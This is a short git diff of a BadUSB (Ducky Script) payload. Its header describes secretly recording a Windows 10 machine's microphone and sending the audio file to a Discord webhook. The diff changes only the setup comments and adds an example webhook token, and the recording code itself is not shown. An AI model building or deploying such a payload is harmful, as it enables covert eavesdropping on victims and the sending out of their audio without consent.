diff --git a/Record-Mic-to-Discord/Record-Mic-to-Discord.txt b/Record-Mic-to-Discord/Record-Mic-to-Discord.txt index eb409d3..0ddb867 100644 --- a/Record-Mic-to-Discord/Record-Mic-to-Discord.txt +++ b/Record-Mic-to-Discord/Record-Mic-to-Discord.txt @@ -3,7 +3,9 @@ REM Author: @beigeworm REM Description: This script finds the default microphone and records for a specified time to a mp3 file, then sends the file to a discord webhook. REM Target: Windows 10 -REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook Channel and Token ONLY +REM eg. $dc='1206563651960586035/sNqypsq629XmXpc9TP924Dxeox6qMHDCI5e27qJ3fw4ef34wff4wf_df3aFOY' .... REM some setup for dukie script DEFAULT_DELAY 100